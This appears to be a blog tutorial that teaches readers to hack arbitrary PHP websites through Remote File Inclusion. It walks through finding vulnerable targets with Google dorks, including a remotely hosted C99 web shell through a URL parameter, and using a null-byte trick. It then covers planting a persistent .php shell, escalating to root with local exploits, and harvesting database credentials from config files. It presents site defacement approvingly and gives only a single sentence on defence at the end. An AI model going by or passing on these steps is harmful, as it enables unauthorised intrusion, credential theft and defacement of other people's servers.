What is Remote File Inclusion (RFI)? How it used to hack Websites?

These days hacking terminology has gone such a mad subject that every one wants to get one or more tricks to penetrate into personal accounts whether it is EMAIL accounts, personal social networking accounts on facebook or orkut or the website passwords. Though ethical hacking is not a bad idea; but until it not harms some one privacy. Few days back I got a mail from one of my friend asking is there any way we can remotely get the admin rights of any websites? I googled a lot and finally came to a conclusion that the sites using old php version below ver 6.00 can be hacked via Remote file Inclusion…. and too my surprise I have also found that more than 90% websites are vulnerable to such attack. Now……..get the idea in detail…..

First of all let you know What is Remote File Inclusion?

Remote File Inclusion is way of inserting a file called SHELL (This is a graphical user interface responsible to give you the rights to browsing the remote files and running you own code on the web servers) via remote access to get the admins rights…. hence this is why the most popular method of hacking websites. The shell file if included well in the server then allow the hackers to execute the server side commands as if the user logged over the servers; along with access to all the servers files. We also today in this article are going to learn the same technique to use local exploits to escalate our privileges and get control over the whole server…. but keep in mind that this is only for tutorial purpose neither I nor the site will have any responsibility what you do at your own end.

The Vulnerability in PHP below ver. 6……

Now let process to next step… as we have already learned the php based websites can easily hacked via Remote file Inclusion but what’s the way…. and what are the basic vulnerabilities that targets the websites hack…..

Many of the web servers are vulnerable to this type of attack because of PHP’s default settings of register_globals and allow_url_fopen being enabled. Though in the latest release register_globals has been removed (This is why the continous notificaltion we get to update our scripts and applications)  but sadly it still have the second vulnerability remains open, so we can give it a try to latest version PHP websites too.
But a good news for hackers is that around 90% websites on the internet still uses old versions of PHP and another good news in those 90% websites, more than 60% websites has default settings enabled. That means we can hack most of the websites and deface them. Isn’t that cool, but as i have said we are ethical hackers we only find vulnerabilities in the websites .

So now let’s begin with the steps of Website Hacking….

Step 1: First of all you need to search for the websites that can be hacked i.e. having PHP script vulnerability. The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results. You can download the list of Dorks from the link here

Step 2: Identifying Vulnerable website that have the page navigation system similar to below mentioned:

http://target-site.com/index.php?page=PageName

Step 3: Once you have found the websites that seems the page navigation system looks like the above no check if a the website is vulnerable to remote file inclusion attack, we would try to include a website link  instead of PageName as shown below:

http://target-site.com/index.php?page=http://google.com

Now if the Google Home Page opens, then its confirmed that website is vulnerable to Remote File Inclusion attack and we will continue our attack. If Google homepage doesn’t opens, we will try another website.

Step 4: Now you hot the link of the website that can be hacked, so now its time to include the shells into the website. There are number of shells available online but my favorite are C99 and r57 because of their extended functionality and features. Though you always don’t need to download these shells on your systems or PC, as you can directly use the online resources for doing that but if you wish you can download them from their respective websites. On this site I have not provide these because its unethical but you can easily Google it … To find the a shell the hacker would search Google for:

inurl:c99.txt

This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of Shell  so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.
For future use of Analysis you can download these shells from here:

http://www.localroot.net/

The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?

Step 5: Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.
Step 6:  Vulnerabilities Database
In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be:

allinurl:.php?page=

This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar
words.
Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

Step 6: So now If you succeeds in getting the server to parse the shell, then we will be see a screen similar to the following:


hacking websites using remote file inclusion, learn how to hack websites
Hacking Website using Shell RFI attack
The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.

Step7: Find Root Privileges on Server
Now we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. you can find list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the times contain username and passwords for the MYSQL databases and such.
That’s all the way to hack websites using the remote file inclusion method. I hope you all have liked it.

Now the most asked question How to Protect your Websites and Forums from Remote file inclusion attack?

To protect yourself from RFI attacks, the best way is simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.

Leave a Reply

Your email address will not be published. Required fields are marked *